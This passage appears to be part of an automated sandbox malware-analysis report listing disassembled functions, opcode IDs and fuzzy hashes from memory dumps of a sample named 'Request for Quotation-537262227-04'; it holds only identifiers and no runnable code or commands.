                                                • Instruction Fuzzy Hash: 56D11A34A006159FDB54DF69C584A6AB7F2FF88310F65C599E905AB362DB30EC81CFA0
                                                Function 06235FF0 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /$F
                                                • API String ID: 0-2718424524
                                                • Opcode ID: 88a226040c4ce79f30d0470cd9540fa8391f860fdc68f782fe73020a3d7cbfd1
                                                • Instruction ID: 2537cf2ae1c3d9715cffb7671a18fd202a05649d124b15ce365d2038a73852bb
                                                • Opcode Fuzzy Hash: 88a226040c4ce79f30d0470cd9540fa8391f860fdc68f782fe73020a3d7cbfd1
                                                • Instruction Fuzzy Hash: EC41A8B1D156298BEB58DF6BC94929DFBF7AFC9300F14C0AAC80DA6214DB740A85CF51
                                                Function 063766B8 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (iq
                                                • API String ID: 0-3943945277
                                                • Opcode ID: 7b1309f15bc8d44da15c3f1a30946196359d4cca72548be6e81e04ae927bd327
                                                • Instruction ID: 64bd81611f5e3090bb49f0210ece0394fbabe64bca0fd88c92ef77ec31ae7aae
                                                • Opcode Fuzzy Hash: 7b1309f15bc8d44da15c3f1a30946196359d4cca72548be6e81e04ae927bd327
                                                • Instruction Fuzzy Hash: D9327A70A006168FCB64DF69C4A566EBBF2FF8A300F24852DD55AD7381CB38A945CBC4
                                                Function 0623B7A8 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: sE}Pca:e
                                                • API String ID: 0-2794876996
                                                • Opcode ID: 050eadde7170e58fd3e5f6b1defd30208426ab787f3051417d5c983d9ca88ee3
                                                • Instruction ID: e428e7feaf3296377ba67b2ff42f5d2a24614db4731e17bb1482b4bf63fdea86
                                                • Opcode Fuzzy Hash: 050eadde7170e58fd3e5f6b1defd30208426ab787f3051417d5c983d9ca88ee3
                                                • Instruction Fuzzy Hash: E212C4B0E146198FDB54CFAAC980A9DFBF2FF88304F24C569D419AB219D734A946CF50
                                                Function 06399948 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Teeq
                                                • API String ID: 0-348098666
                                                • Opcode ID: 604344f44b979733097bb7da5b2531e065124d0e6396dec7866db62af02d3b2e
                                                • Instruction ID: d207c4911222f749ec4ca933d8770ff1fe0dce64724dd9a55287f0344f299860
                                                • Opcode Fuzzy Hash: 604344f44b979733097bb7da5b2531e065124d0e6396dec7866db62af02d3b2e
                                                • Instruction Fuzzy Hash: A2A1E774D05218CFEF54CFAAD884BADBBF6FB89300F1480A9D409A7295DB355985CFA0
                                                Function 06399938 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Teeq
                                                • API String ID: 0-348098666
                                                • Opcode ID: e555b5e77573cce5b54bfc82466415ffaa971ab684d3a1c00ae4890bedc53c0f
                                                • Instruction ID: 02f2c5fd3a9737092b86ef0e81f861fd9a848a12c1c56c5e1c0877dcc8ae2cdc
                                                • Opcode Fuzzy Hash: e555b5e77573cce5b54bfc82466415ffaa971ab684d3a1c00ae4890bedc53c0f
                                                • Instruction Fuzzy Hash: AFA1E574E15218CFEB54CFAAD884BADBBF2FF89300F1480A9D409A7295DB355985CF90
                                                Function 06390040 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r
                                                • API String ID: 0-1812594589
                                                • Opcode ID: 3416f78dc6dc088140c002e163809d1940da36be1f2dbcbe326f061ebf102d3c
                                                • Instruction ID: b0466d66a736840abf222b61bc55db9834a29322a670f9b95cdf379d7e12d4db
                                                • Opcode Fuzzy Hash: 3416f78dc6dc088140c002e163809d1940da36be1f2dbcbe326f061ebf102d3c
                                                • Instruction Fuzzy Hash: 11414D75D05A188FEB5CCF6B8C4479AFAF7BFC9201F54C1BA840CAA264EB3015858F51
                                                Function 06235FE0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F
                                                • API String ID: 0-1304234792
                                                • Opcode ID: 94135428e330413d5d3be11f6cf2330ec13c62885b08bdbfe8269913459786c7
                                                • Instruction ID: 9b09f72b30297c84cacf37ff22aea69e1ad8d5d16c674389fffbcc8b63c15159
                                                • Opcode Fuzzy Hash: 94135428e330413d5d3be11f6cf2330ec13c62885b08bdbfe8269913459786c7
                                                • Instruction Fuzzy Hash: 643193B1E156198BEB5CCF6B8D4529AFBF7AFC9300F14C1BA840CA6214DB750A868F51
                                                Function 0272CEE4 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2155589502.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2720000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2266fcb2b7f82aaddbbf8d5131cea81c9dcc21cdbf6d2f800586b5232490c9b9
                                                • Instruction ID: a9a02efb04adb556ac1a21889e37837d23e8f6eb676077a2747f2c2dacc0da76
                                                • Opcode Fuzzy Hash: 2266fcb2b7f82aaddbbf8d5131cea81c9dcc21cdbf6d2f800586b5232490c9b9
                                                • Instruction Fuzzy Hash: 8BA17F32E002298FCF16DFB5C84459EB7B2FF85304B15856EE805AB265DB71E95ACF80
                                                Function 063A3EA0 Relevance: .3, Instructions: 262COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177249405.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63a0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3239a9cd0358b2ce518b6039cf62403c86c742ae2becc46ce5bc40f42b4bd7a1
                                                • Instruction ID: b4b8228927e01db7fdc7ab5db0bd7e1f98619c5a7615d7882509b10707eb8c91
                                                • Opcode Fuzzy Hash: 3239a9cd0358b2ce518b6039cf62403c86c742ae2becc46ce5bc40f42b4bd7a1
                                                • Instruction Fuzzy Hash: 69B14870D14208DFEB94DFA9D484BEEBBF6EB4A300F10906ED409A7295DB745984DF81
                                                Function 063A3EB0 Relevance: .3, Instructions: 256COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177249405.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63a0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 144ba1d0fe3749410dbdf00eb470ea33fc7c810ecae0c0ca83bb3a60ced8b120
                                                • Instruction ID: b3df433cfaef562a38f316faa887e1a8fdfa99b0f12d1cf2589f709d2f4c9e12
                                                • Opcode Fuzzy Hash: 144ba1d0fe3749410dbdf00eb470ea33fc7c810ecae0c0ca83bb3a60ced8b120
                                                • Instruction Fuzzy Hash: AEB13770E14208DFEB94DFA9D484BEEBBF6EB8A300F10906DD409A7295DB745984DF81
                                                Function 063CB540 Relevance: .2, Instructions: 235COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a75fa54d5cca5dacd3d1c2223fa7ce083012a0e8a7e993ef77adfb8e629eda0
                                                • Instruction ID: e2e30e5bbec09d3752588b0b16e14ca8a29bce4f97dea750aee340d6a150d307
                                                • Opcode Fuzzy Hash: 2a75fa54d5cca5dacd3d1c2223fa7ce083012a0e8a7e993ef77adfb8e629eda0
                                                • Instruction Fuzzy Hash: 07B1F474D01228CFEB90DFA8D944B9DBBB6FB89310F1081AAE40AA7354DB745D85CF81
                                                Function 063A4438 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177249405.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63a0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7249e8c4b99db25e2ae2585d184f789f6102a4ba6085dc9cbdabe0cb7773feca
                                                • Instruction ID: 92d35e0f8d6a0bac82bc738824e89c01a66a01bc9678ad2f545a5cd5cecbbcf5
                                                • Opcode Fuzzy Hash: 7249e8c4b99db25e2ae2585d184f789f6102a4ba6085dc9cbdabe0cb7773feca
                                                • Instruction Fuzzy Hash: B8916B70D04308DFDB94DFA5E484BAEBBF6EB4A300F10906ED419A7292DBB85845DF91
                                                Function 063791D1 Relevance: .2, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4088c9b65d8ca5b87e5ccbcce3d3c023a854a6fa035c5fde4f843234dd2aba7
                                                • Instruction ID: 369568b7db22281726ba69ad64db19ec2cbf898f5795f16707615f7d4d10fc1c
                                                • Opcode Fuzzy Hash: c4088c9b65d8ca5b87e5ccbcce3d3c023a854a6fa035c5fde4f843234dd2aba7
                                                • Instruction Fuzzy Hash: 93812970C09208CFEBA0DFA9D5887EDBBF6FB49304F14512AD409A7295D3795985CF80
                                                Function 063C89E0 Relevance: .2, Instructions: 207COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b947cc2c4d192a079a73d17aa044a3ec1ea7fc579ab2d165bbad1fcb0d255c5f
                                                • Instruction ID: a94941fb6b3bf7e1f758f428a1756888c23097e04bbf6c437adda92f994b3e08
                                                • Opcode Fuzzy Hash: b947cc2c4d192a079a73d17aa044a3ec1ea7fc579ab2d165bbad1fcb0d255c5f
                                                • Instruction Fuzzy Hash: 7C812974D15218CFEB94DFA9D444BADBBF6EB89310F10906DE009A3295DB34AE45CF84
                                                Function 063C8AF8 Relevance: .2, Instructions: 196COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0dc866d058e636379733e71e9f282931c8f44acee390184bb28697ca2cb151f0
                                                • Instruction ID: ef29353a4353a9ebe2bbef746327ec1fcca0c7ef8f5f441e26bb0c2f706baa43
                                                • Opcode Fuzzy Hash: 0dc866d058e636379733e71e9f282931c8f44acee390184bb28697ca2cb151f0
                                                • Instruction Fuzzy Hash: B9810670E15218CFEB94DF69D444BADBBF6EB89310F10906DE009A7295DB34AE45CF84
                                                Function 0668CD50 Relevance: .2, Instructions: 183COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b1a8af0d035699623ad2888d6cfa53aedd89855ece880bd67698428e9b70964
                                                • Instruction ID: 7c0988604a1579987ebda96dfbcca1b1d1ab523b0822c8c84e5476cd63053eaf
                                                • Opcode Fuzzy Hash: 2b1a8af0d035699623ad2888d6cfa53aedd89855ece880bd67698428e9b70964
                                                • Instruction Fuzzy Hash: B9714874D44218CFEBA4EFB9C884BADBBF5AF89300F109569D019BB241D774598ACF60
                                                Function 0637A280 Relevance: .1, Instructions: 145COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fba0a9db0b79fe336655cb33c33fa7270ed3b5fe8173413691b76e0b0d3a74e1
                                                • Instruction ID: fc2e373c372a1234dad58bf7764dfc178ac668c180ea53afffaac5b2c606509a
                                                • Opcode Fuzzy Hash: fba0a9db0b79fe336655cb33c33fa7270ed3b5fe8173413691b76e0b0d3a74e1
                                                • Instruction Fuzzy Hash: 55514470D05218DFEBA5CFA9D8487EDBBFAFB89300F10902AD409A7294D7795946CF80
                                                Function 0637A290 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da8624998aac58a224f50486215920b77c13ae0ad486cd71b8a4b589f73bc188
                                                • Instruction ID: 89375f262a218bb30b8b1aca232d8dd264fa57f8edc49987bacb4a16ed440798
                                                • Opcode Fuzzy Hash: da8624998aac58a224f50486215920b77c13ae0ad486cd71b8a4b589f73bc188
                                                • Instruction Fuzzy Hash: 6D512470D05218DFEBA4DFA9D8487EDBBFAFB89300F10902AD419A7294DB795945CF80
                                                Function 06410006 Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177322133.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6410000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a46a4a28c6a77fda6174a80d42ea78200d5c1a3ca157c794d075086dcdbb7d37
                                                • Instruction ID: b4d30fb2d29ca9161a1d5212c428bacca0589b89671ca70f3384c9f38f8ccdeb
                                                • Opcode Fuzzy Hash: a46a4a28c6a77fda6174a80d42ea78200d5c1a3ca157c794d075086dcdbb7d37
                                                • Instruction Fuzzy Hash: 5B517C71D056588FE76DCF278D416C6FAF3AFC9300F04C1FA954CAA225EB740A868E51
                                                Function 063C31E1 Relevance: .1, Instructions: 126COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2bdf661496b413d3111824b5b4e72ab2a01801eb7e67b768c4b28326990ceeb1
                                                • Instruction ID: c7c569e7ce7e5b271a94e555e4bb5141cccf1aa5512da505c97d734b56c4ac79
                                                • Opcode Fuzzy Hash: 2bdf661496b413d3111824b5b4e72ab2a01801eb7e67b768c4b28326990ceeb1
                                                • Instruction Fuzzy Hash: 24512474E042089FDB88DFA9D854AAEBBF6FF89310F10806AE505A7390DB349D45CF91
                                                Function 0623B798 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34934288dc7285b5acf8b3eab43ef040091464260edd49666213b029aea3422e
                                                • Instruction ID: 7f7d9e836011f04fe8ab4d7856f5226d2d9112dd63a880de988d56b9326cd7cf
                                                • Opcode Fuzzy Hash: 34934288dc7285b5acf8b3eab43ef040091464260edd49666213b029aea3422e
                                                • Instruction Fuzzy Hash: E74166B5E016199BDB18CFABC94069EFBF3AFC8300F14C07AD918AB254EB3459468B54
                                                Function 0637E128 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 541efdb2fd57b86b0a16f104d5fe096e630c3f4bf7e8f11ba684b361def796dc
                                                • Instruction ID: a1cc1c7aa27647bf774102ca1926b5f0663c7cbcf313cf55fc3d375980ec8e5a
                                                • Opcode Fuzzy Hash: 541efdb2fd57b86b0a16f104d5fe096e630c3f4bf7e8f11ba684b361def796dc
                                                • Instruction Fuzzy Hash: 4B416970D19209DFDB90DFA8D885BEEBBF6BF4A300F0084A9D429A7251D7381A45CF91
                                                Function 06410040 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177322133.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6410000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a3ed7f1d4374c127ffbf6da3175d37ce6120fdc31fe61d42d190402d2e10148
                                                • Instruction ID: 461da8c5bc5959f7a74e36c1e31fe6594d6b6ae5fcecb0b0169032b601be210d
                                                • Opcode Fuzzy Hash: 5a3ed7f1d4374c127ffbf6da3175d37ce6120fdc31fe61d42d190402d2e10148
                                                • Instruction Fuzzy Hash: A0512F75D056588BEB6CCF2B8D456CAFAF3AFC9300F14C1FA954CAA214EB740AC58E41
                                                Function 06670006 Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 999fe21195061d90691433867512675225203b99b2c416b5d91dcb6d13681699
                                                • Instruction ID: a23105b52b74199b1af60ff152003046997fd41eee59e09552b2636b3885dfa2
                                                • Opcode Fuzzy Hash: 999fe21195061d90691433867512675225203b99b2c416b5d91dcb6d13681699
                                                • Instruction Fuzzy Hash: D2317EB0D092549FDB69CFAB8C0468ABFF7AF86300F05C0EAD048AA215D7740986CF61
                                                Function 06670040 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4322456974ae1e3483080cada65e9244efeeecdb3fbfe3e75ce3e8efe8a591d
                                                • Instruction ID: 45eb8fd1e7da605038dbfcfa13fffb8fafe75a68e62773f762d74afaad77a525
                                                • Opcode Fuzzy Hash: d4322456974ae1e3483080cada65e9244efeeecdb3fbfe3e75ce3e8efe8a591d
                                                • Instruction Fuzzy Hash: F631F7B1E056689FDB68CFAAC8446D9FBF6AF89300F00C1EAD40DA7215DB705A818F41
                                                Function 0639003A Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24a80352b94abf0608e6e4d0e26dc5b8404fbe7422b50a4b84687e7523892041
                                                • Instruction ID: 7463e16055b2e11fcab06075d085434f2da76a04a5e9498f7910c72b662ce7cb
                                                • Opcode Fuzzy Hash: 24a80352b94abf0608e6e4d0e26dc5b8404fbe7422b50a4b84687e7523892041
                                                • Instruction Fuzzy Hash: 93311071E05A188BEB5CCF6B8D4069EFAF7BFC9301F14C1BA841CAA258EB3005468F51
                                                Function 063C3B60 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d21223c46bcbd574701f7e84fa93af48ffe5d03fe56fea1462fd4ef6d469d93
                                                • Instruction ID: fac33fd04e12dfc3605f45ff8462b9cafae19c3db53a788ddb5d1a09c1088ffc
                                                • Opcode Fuzzy Hash: 3d21223c46bcbd574701f7e84fa93af48ffe5d03fe56fea1462fd4ef6d469d93
                                                • Instruction Fuzzy Hash: 0131C4B0D056188FEB68CFAAC9457DEBBF2AB89310F14C0AED408A7651D7740989CF90
                                                Function 0623463D Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ac67b75e17cd31b3115ab78a03fcf6c06269b66f404f687d131c4e1d4991d1e
                                                • Instruction ID: dd5fc51d9e27cf6b5fa4b4a7dfa6144f819e171a857cb6c41dc4f04c5b4dbfea
                                                • Opcode Fuzzy Hash: 7ac67b75e17cd31b3115ab78a03fcf6c06269b66f404f687d131c4e1d4991d1e
                                                • Instruction Fuzzy Hash: FD21FCB1D156688BE769CF6B8C042DAFBF7AFC9300F04C0AAC84DAA225D7700985CF40
                                                Function 0623462D Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e46da4a9d481ccae70c901820a833d6e9936a545a4c04ef9d8cfaf77ef7ab823
                                                • Instruction ID: 38494e8f6c4682b3b3c500a9b9dd422da792059e187bf5ae003906589397dc93
                                                • Opcode Fuzzy Hash: e46da4a9d481ccae70c901820a833d6e9936a545a4c04ef9d8cfaf77ef7ab823
                                                • Instruction Fuzzy Hash: 9621FCB1D156688BD769CF6B8C042DAFBF7AFC9300F04C0A6C809AA225D7710945CF51
                                                Function 0637C5F8 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb86c3988b062946ea75fa3806d48171b7439c51af543bde1a7dddc7111c6f6d
                                                • Instruction ID: fbbb6bac989255a26fe1dc697cea74f930b72ac53ad75945c5e0ebdf47135c34
                                                • Opcode Fuzzy Hash: eb86c3988b062946ea75fa3806d48171b7439c51af543bde1a7dddc7111c6f6d
                                                • Instruction Fuzzy Hash: 8D11D7B1D016189FEB68CFAAC9447DEFBF7AF89300F14D06AD409A6254DB740A45CF50
                                                Function 0623E490 Relevance: 7.7, Strings: 6, Instructions: 151COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (iq$4'eq$4'eq$4'eq$4'eq$piq
                                                • API String ID: 0-522782192
                                                • Opcode ID: 2c9478a7f2af6645a84ced0257b7d3ad67d66e98c1c34ea4c4d6d3591be40a57
                                                • Instruction ID: b25686267a506312138871d92618efac1f6b80b1c46589caae90e62ac344e484
                                                • Opcode Fuzzy Hash: 2c9478a7f2af6645a84ced0257b7d3ad67d66e98c1c34ea4c4d6d3591be40a57
                                                • Instruction Fuzzy Hash: 9D51A0B1A002058FC746DB79C8517AFBBA7EFC8300F54886DD54A9B296EF70AD0587A1
                                                Function 06689240 Relevance: 7.6, Strings: 6, Instructions: 98COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !$(oeq$(oeq$(oeq$)$\seq
                                                • API String ID: 0-1539741097
                                                • Opcode ID: 9905ddf85553fcd21696020af9d3e23428e5dbba18cc460bc18b5c7a4924f47a
                                                • Instruction ID: 9fbba4d33650243d0a9873dc53bd10ffda836e377340a59e3306ed37ffe21360
                                                • Opcode Fuzzy Hash: 9905ddf85553fcd21696020af9d3e23428e5dbba18cc460bc18b5c7a4924f47a
